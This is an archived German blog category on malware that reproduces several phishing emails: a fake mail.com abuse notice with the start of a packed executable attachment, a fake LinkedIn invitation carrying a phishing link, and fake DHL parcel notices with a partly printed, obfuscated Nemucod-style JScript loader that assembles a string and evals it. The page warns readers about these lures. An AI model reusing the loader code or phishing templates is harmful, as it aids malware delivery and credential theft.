Archive for the ‘Schadprogramm’ Category

Returned mail: Data format error

Samstag, Januar 13th, 2018

Dear user of mail.com,

Your account was used to send a huge amount of unsolicited commercial e-mail during this week.
Probably, your computer was infected by a recent virus and now contains a trojaned proxy server.

We recommend that you follow our instruction in the attached file in order to keep your computer safe.

Best regards,
mail.com technical support team.
MAILER-DAEMON@mail.com


Der Anhang transcript.zip entpuppt sich als transcript.txt.exe, also als Schadprogramm:

MZêˇˇ∏@ÿ∫¥ Õ!∏LÕ!This program cannot be run in DOS mode.

$PEL‡ `ÄÌêPı0UPX0ÄćUPX1`ê`@‡.rsrcd@¿1.24UPX!  ˚áHë¶qµ∆˚\û&wˇá®êkernel32.dˇõÁflll5root\IEFrameATV˛ˇ¸H_Noterctrl_renwndˇ∑ˇˇ|y_Óœπ›fig;ÑÄ‘8 ≤ü˚çx∂ˇˇˇ@@+ÙAÅOÕ¸ˇ◊%k@<èS6@ˇnˇflTÒ˝ß3ªΩöAWÖ@]/∑€›@-
y(§,ä‹óø¸Âæ/øß8Ö/∑∑ˇÚ]é_Œ Dec£vOüS›æ˚€ep^ugJulnMayprkóÌÕFebaSa’›s∑ÌiThuWedufiMo/≤èmø%s, %us.2u:Û¬{[c=Into≠µÌtGC:zHSta˚˛(dnsapiUiphlp
usw.


Details zur IP-Adresse 59.37.166.64

inetnum: 59.32.0.0 – 59.42.255.255
netname: CHINANET-GD
descr: CHINANET Guangdong province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
country: CN



Wenn Sie den kompletten Text lesen wollen, klicken Sie bitte auf den Titel des Beitrags!

RE: Kindly Add me On Linkedin Pls i need 80,000pcs again asap

Sonntag, Mai 14th, 2017

LinkedIn  

Mohamed Abd El Wahab
Kasim Khah smile@frazpc.pl

Hi master@google.com
I’d like to connect with you on LinkedIn. pls
Abdul Kalid Jamal
Chief Executive Officer, GLOBAL LLC
http://tasaroobat.com/css/styles/xml/asp.net/source/index.php?login=master@google.com

Accept      View Profile

From IO 217.149.251.15
BELLONANET
Bellona S.A.
ul. Grzybowska 77
00-844 Warszawa
PL

© 2015 LinkedIn Ireland Limited. LinkedIn, the LinkedIn logo, and InMail are registered trademarks of LinkedIn Corporation in the United States and/or other countries. All rights reserved.

You are receiving Invitation emails. Unsubscribe
This email was intended for master@google.com. Learn why we included this.
LinkedIn is a registered business name of LinkedIn Ireland Limited.
Registered in Ireland as a private limited company, Company Number 477441
Registered Office: 70 Sir John Roberson’s Quay, Dublin 2



Wenn Sie den kompletten Text lesen wollen, klicken Sie bitte auf den Titel des Beitrags!

Parcel details

Samstag, Oktober 1st, 2016

Dear faker,

We couldn’t deliver your parcel on September 30th because we couldn’t verify the given address.

Attached is the shipment label. Please print it out to take the parcel from our office.

Label-ID: oijwefieiwfijügrgoüoig+pogp+pojeroo

Best Wishes,
Abigail Mcconnell
DHL Express Service

DHL <Mcconnell.00837@appsgadgets.ru>


Dear fuker,

We couldn’t deliver your parcel on September 30th because we couldn’t verify the given address.

Attached is the shipment label. Please print it out to take the parcel from our office.

Label-ID: oijwefieiwfijügrgoüoig+pogp+pojeroo

Best Wishes,
Karin Talley
DHL Express Service

DHL <Talley.57941@richard.ch>

Der Anhang:

<job target=“blank“><script language=“JScript“>var ZBb = „“;
var Xj = 0;
/*@cc_on

var nemucod = 0;
function Uz() {nemucod++; return (0, ‚\x0a‘);}
function MPf() {nemucod++; return (0, ‚\x0d‘);}
—————
function Le() {nemucod++; return (0, ‚\x2f‘);}
function Kz() {nemucod++; return (0, ‚\x2d‘);}
function Li() {nemucod++; return (0, ‚\x2e‘);}
function KHe() {nemucod++; return (0, ‚\x2b‘);}
function YXk() {nemucod++; return (0, ‚\x2c‘);}
function Pf() {nemucod++; return (0, ‚\x2a‘);}
function VZy() {nemucod++; return (0, ‚C‘);}
function Zv() {nemucod++; return (0, ‚G‘);}
function MAh() {nemucod++; return (0, ‚K‘);}
function Np0() {nemucod++; return (0, ‚O‘);}
function Kf() {nemucod++; return (0, ‚S‘);}
function Cy() {nemucod++; return (0, ‚\x25‘);}
function CWm() {nemucod++; return (0, ‚\x22‘);}
function Ci() {nemucod++; return (0, ‚W‘);}
function Ez() {nemucod++; return (0, ‚x‘);}
function Wy() {nemucod++; return (0, ‚\x28‘);}
function Np() {nemucod++; return (0, ‚\x29‘);}
function Gc() {nemucod++; return (0, ‚c‘);}
function BBz() {nemucod++; return (0, ‚g‘);}
function ATq() {nemucod++; return (0, ‚k‘);}
function XZq() {nemucod++; return (0, ‚o‘);}
function Ep() {nemucod++; return (0, ’s‘);}
function Qj() {nemucod++; return (0, ‚w‘);}
function Zh() {nemucod++; return (0, ‚\x20‘);}
————–
function Oo() {nemucod++; return (0, ‚N‘);}
function Ru() {nemucod++; return (0, ‚R‘);}
function Ne() {nemucod++; return (0, ‚V‘);}
function Uj() {nemucod++; return (0, ‚Z‘);}
function Pv() {nemucod++; return (0, ‚b‘);}
function MWz() {nemucod++; return (0, ‚\x40‘);}
function Mu() {nemucod++; return (0, ‚f‘);}
function Uu() {nemucod++; return (0, ‚j‘);}
function Mr() {nemucod++; return (0, ’n‘);}
function UKh() {nemucod++; return (0, ‚r‘);}
function GNf() {nemucod++; return (0, ‚v‘);}
function XLt() {nemucod++; return (0, ‚z‘);}
function Kn() {nemucod++; return (0, ‚B‘);}
function Iy() {nemucod++; return (0, ‚u‘);}
function SQd() {nemucod++; return (0, ‚A‘);}
function Gy() {nemucod++; return (0, ‚E‘);}
function Gk() {nemucod++; return (0, ‚I‘);}
function Xa() {nemucod++; return (0, ‚M‘);}
————-
function Gf() {nemucod++; return (0, ‚\x5e‘);}
function Lz() {nemucod++; return (0, ‚\x5d‘);}
function PMv() {nemucod++; return (0, ‚\x5c‘);}
function XOs() {nemucod++; return (0, ‚\x5b‘);}
function Hb() {nemucod++; return (0, ‚y‘);};
var Px = [Mu(),Iy(),Mr(),Gc(),EZa(),UXd(),XZq(),Mr(),Zh(),ZZg(),Wy(),Np(),BCq(),Uz(),Zh(),Zh(),Zh(),Zh(),GNf(),JEv(),UKh(),Zh(),NGd(

————

),UCi(),Ep(),UXd(),Hb(),Iy(),Nk(),BBz(),Mu(),Iy(),Ep(),EZa(),Nk(),BBz(),Zh(),Nc(),Zh(),CWm(),Ci(),Kf(),CWm(), ()

),Uz()];
do
{
    ZBb = ZBb[„concat“](Px[Xj]);
} while (++Xj < Px[„length“]);
eval(ZBb);
@*/
</script></job>



Wenn Sie den kompletten Text lesen wollen, klicken Sie bitte auf den Titel des Beitrags!

Diese Seiten sind Bestandteil der Domain www.stangl.eu

© Werner Stangl Linz 2018